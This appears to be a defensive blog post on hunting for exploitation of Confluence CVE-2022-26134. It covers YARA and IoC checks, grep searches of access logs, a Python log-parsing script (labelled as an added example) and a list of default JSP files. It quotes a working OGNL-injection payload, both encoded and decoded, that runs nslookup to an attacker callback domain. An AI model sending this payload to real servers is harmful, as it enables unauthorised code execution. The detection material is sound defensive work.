Hunting for Confluence RCE [CVE-2022-26134]

th3b3ginn3r
3 min read · Jun 3, 2022


On the 2nd of June Atlassian announced that their products — Confluence Server and Confluence Data Center — are affected by a remote code execution vulnerability, now known as CVE-2022-26134. This news shook the internet. As of this writing Atlassian has not released a patch; however, the vulnerability is already being exploited in the wild.

Update [2022/06/04]: The patch is released now.

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html/

Since the vulnerability is being actively exploited, many of us want to know whether our Atlassian Confluence servers have already been exploited.

Here is how we can do it for now.

1. We can run a YARA scan for the presence of a web shell on the Confluence server. Why a web shell? Because the threat actors were seen dropping web shells after exploiting the vulnerability, as observed by the Volexity team, who first disclosed this vulnerability.

Here is how we can do it:

2. Next, we may want to scan for the IoCs that have been seen exploiting the Confluence vulnerability.

3. We may want to look at the Confluence access logs and the catalina*.log files for any suspicious activity. These logs are generally found in the */atlassian/confluence/logs directory.

What does an exploit attempt look like in the logs?

In the Confluence logs, an exploit attempt for CVE-2022-26134 would look similar to the request below:

https[:]//yourconfluenceserver[.]com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me%22%29%7D/

If we decode it, here is how it would look:

https://yourconfluenceserver[.]com/${@java.lang.Runtime@getRuntime().exec("nslookup cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me")}/

Here, the adversary is only checking whether the Confluence server is vulnerable: the injected command makes the server send a DNS lookup for an attacker-controlled "*.oast[.]me" name, an out-of-band callback that confirms code execution without needing any response body.

So, when hunting for exploit attempts on our server, we can search the Confluence access logs for strings such as ${@java.lang.Runtime@getRuntime().exec( (the decoded form) or /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22 (the URL-encoded form). A match tells us that someone attempted to exploit the Confluence vulnerability.

How can we hunt for exploit attempts?

Basic knowledge of grep usage would be enough to help us in hunting the exploit attempts. Here is what we can do:

I'm running commands in the /confluence/logs/ directory
-----------------------------------------------------
grep -Rinse "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22"
http-nio2-8090-exec-77 172.81.129.26 GET / HTTP/1.1 301 66ms - https://yourconfluenceserver.com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20caddh5iqruadh0010f56nyx1b8oo1j.oast.site%22%29%7D/ Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

As we can see, we got a hit: an adversary attempted to exploit the Confluence server for CVE-2022-26134.

Let us understand the log:

Attacker IP: 172.81.129.26
Method: GET
HTTP Response Code: 301
Exploit: https://yourconfluenceserver.com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20caddh5iqruadh0010f56nyx1b8oo1j.oast.site%22%29%7D/
User Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
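The grep-and-decode step above, scripted: this is an added example (not code from the original article) that parses access-log lines in the layout of the hit shown above, URL-decodes the path and referer fields, flags the OGNL payload, and extracts the injected command so the callback domain can be triaged. The field layout is assumed from that single sample line; the first sample entry is the hit from the article and the other two are constructed.

```python
import re
from urllib.parse import unquote

# Sample access-log text: the first line is the hit shown above, the other two are
# constructed (one benign page view, one probe with lowercase hex and an empty referer).
SAMPLE_LOG = """\
http-nio2-8090-exec-77 172.81.129.26 GET / HTTP/1.1 301 66ms - https://yourconfluenceserver.com/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20caddh5iqruadh0010f56nyx1b8oo1j.oast.site%22%29%7D/ Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
http-nio2-8090-exec-12 10.0.0.5 GET /display/DOC/Home HTTP/1.1 200 41ms 8832 https://yourconfluenceserver.com/dashboard.action Mozilla/5.0 (X11; Linux x86_64) Firefox/100.0
http-nio2-8090-exec-13 10.0.0.9 GET /%24%7b%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cadcl3mfo0aeq0000010mmku8891cnyrp.oast.me%22%29%7d/ HTTP/1.1 302 12ms - - curl/7.79.1
"""

# Field layout assumed from the sample line: thread, client IP, request line,
# status, duration, bytes, referer/URL, user agent.
LINE_RE = re.compile(
    r"^(?P<thread>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+ "
    r"(?P<status>\d{3}) (?P<duration>\d+)ms (?P<bytes>\S+) (?P<referer>\S+) (?P<ua>.*)$"
)
# The OGNL expression from the article, matched against the URL-decoded value.
OGNL_RE = re.compile(r"\$\{.*@java\.lang\.Runtime@getRuntime\(\)\.exec\(", re.IGNORECASE)
# Pull the command string out of exec("...") so the callback domain can be triaged.
COMMAND_RE = re.compile(r'exec\("([^"]*)"\)')


def find_exploit_attempts(log_text: str) -> list[dict]:
    """Return one record per log line whose path or referer carries the payload."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected layout
        f = m.groupdict()
        for field in ("path", "referer"):
            decoded = unquote(f[field])  # %24%7B... -> ${...}
            if OGNL_RE.search(decoded):
                cmd = COMMAND_RE.search(decoded)
                hits.append({
                    "ip": f["ip"], "method": f["method"], "status": int(f["status"]),
                    "user_agent": f["ua"], "decoded": decoded,
                    "command": cmd.group(1) if cmd else None,
                })
                break  # one record per line
    return hits


if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["method"]} {hit["status"]} exec -> {hit["command"]!r}')
```

Pipe a real confluence_access_log through find_exploit_attempts and feed the extracted command strings (the nslookup hostnames) into your IoC list.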

Additional Checks

We can also list the JSP files on the Confluence server to make sure no unexpected JSP file is lying around. A standard Confluence installation generally has the JSP files below.

/atlassian/confluence/confluence/noop.jsp
/atlassian/confluence/confluence/errors.jsp
/atlassian/confluence/confluence/errors/notfound.jsp
/atlassian/confluence/confluence/classpath.jsp
/atlassian/confluence/confluence/admin/findspaceattachments.jsp
/atlassian/confluence/confluence/admin/default.jsp
/atlassian/confluence/confluence/admin/cluster/hashclustername.jsp
/atlassian/confluence/confluence/500page.jsp

If we find additional JSP files on the server, we should try to answer questions such as:

  1. When was it created first?
  2. Was it dropped from the internet via the confluence app?

To answer the second question we can refer to the Confluence access logs and the catalina logs; if the file was dropped via Confluence, they should have logged it.

That’s it for now. Do let me know if you have something interesting about this topic and I will update the article for general use.

Happy Hunting!

